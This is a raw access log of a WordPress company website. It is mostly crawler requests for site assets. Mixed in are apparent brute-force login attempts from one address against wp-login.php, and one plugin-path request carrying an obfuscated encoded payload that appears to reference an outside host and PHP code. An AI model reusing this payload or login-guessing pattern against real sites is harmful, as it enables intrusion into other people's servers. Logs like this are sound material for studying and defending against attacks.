103.177.1.132 - - [03/Sep/2026:18:07:10 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
141.255.164.70 - - [03/Sep/2026:18:07:10 +0100] "POST /wp-login.php HTTP/1.1" 200 3146 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:10 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:11 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:11 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:11 +0100] "POST /wp-login.php HTTP/1.1" 200 3150 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:12 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:12 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:13 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:13 +0100] "POST /wp-login.php HTTP/1.1" 200 3150 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:13 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
198.244.165.102 - - [03/Sep/2026:18:07:14 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383533342p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343933342q3165346262306234303037306366306631303631383934386561633137306662222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
141.255.164.70 - - [03/Sep/2026:18:07:14 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:14 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:15 +0100] "POST /wp-login.php HTTP/1.1" 200 3150 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:15 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:15 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:16 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:16 +0100] "POST /wp-login.php HTTP/1.1" 200 3151 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:17 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:17 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:17 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:18 +0100] "POST /wp-login.php HTTP/1.1" 200 3149 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:18 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
141.255.164.70 - - [03/Sep/2026:18:07:19 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
103.177.1.132 - - [03/Sep/2026:18:07:19 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
173.252.82.29 - - [03/Sep/2026:18:07:30 +0100] "GET / HTTP/1.1" 200 46964 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.3 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/uploads/elementor/css/custom-pro-widget-nav-menu.min.css?ver=1786328021 HTTP/1.1" 200 3380 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.3 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.26.3 HTTP/1.1" 200 282 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.69.31 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1786328021 HTTP/1.1" 200 7275 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.87.6 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/css/widget-loop-carousel.min.css?ver=3.26.2 HTTP/1.1" 200 1383 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.112 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.26.3 HTTP/1.1" 200 814 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.69.34 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/themes/astra-child/style.css?ver=1.0.0 HTTP/1.1" 200 716 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.112 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5 HTTP/1.1" 200 4626 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.95.42 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.26.3 HTTP/1.1" 200 199 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.69.34 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/fadeInRight.min.css?ver=3.26.3 HTTP/1.1" 200 131 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/fadeInDown.min.css?ver=3.26.3 HTTP/1.1" 200 131 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.45 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/css/widget-loop-common.min.css?ver=3.26.2 HTTP/1.1" 200 169 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.78 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.26.3 HTTP/1.1" 200 1182 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?ver=1.2.1 HTTP/1.1" 200 24109 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/fadeInLeft.min.css?ver=3.26.3 HTTP/1.1" 200 131 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.45 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.8.9 HTTP/1.1" 200 23586 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.78 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/css/widget-form.min.css?ver=3.26.2 HTTP/1.1" 200 1602 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.1 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/uploads/elementor/css/custom-apple-webkit.min.css?ver=1786328021 HTTP/1.1" 200 575 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.44 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.8.9 HTTP/1.1" 200 8670 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.44 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-shrink.min.css?ver=3.26.3 HTTP/1.1" 200 129 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.84 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.72 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1786328021 HTTP/1.1" 200 826 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.13 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/css/modules/sticky.min.css?ver=3.26.2 HTTP/1.1" 200 127 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.0 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.26.3 HTTP/1.1" 200 175 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.33 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/uploads/elementor/css/custom-widget-icon-list.min.css?ver=1786328021 HTTP/1.1" 200 1110 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.50 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.14 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.26.2 HTTP/1.1" 200 3721 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.74 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1" 200 5520 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
69.63.184.26 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.26.3 HTTP/1.1" 200 5326 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.2 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.26.2 HTTP/1.1" 200 24210 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.26.2 HTTP/1.1" 200 6263 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.76 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/dist/i18n.min.js?ver=781d11515ad3d91786ec HTTP/1.1" 200 5732 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/dist/hooks.min.js?ver=7496969728ca0f95732d HTTP/1.1" 200 5050 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.11 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1" 200 21464 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.68 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.26.3 HTTP/1.1" 200 52754 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.79 - - [03/Sep/2026:18:07:31 +0100] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.26.3 HTTP/1.1" 200 45428 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.31 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.26.2 HTTP/1.1" 200 44624 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.38 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/HelveticaNeueLTStd-Bd.ttf HTTP/1.1" 200 28252 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.41 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/02/Trencher-Deployment-2.webp HTTP/1.1" 200 72906 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.49 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/HelveticaNeueLTStd-Md.ttf HTTP/1.1" 200 28192 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.95.76 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/White-logo-no-background-1.svg HTTP/1.1" 200 348498 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.79 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/logo-_1-1-1.svg HTTP/1.1" 200 170448 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.70.23 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/Videos-and-images-for-boat-link-pag.webp HTTP/1.1" 200 236160 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.59 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/Brown-Logo.svg HTTP/1.1" 200 225574 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
173.252.82.59 - - [03/Sep/2026:18:07:32 +0100] "GET /wp-content/uploads/2025/01/IMG-20241119-WA0004-1.webp HTTP/1.1" 200 202384 "https://www.marinecableservices.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-webindexer/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
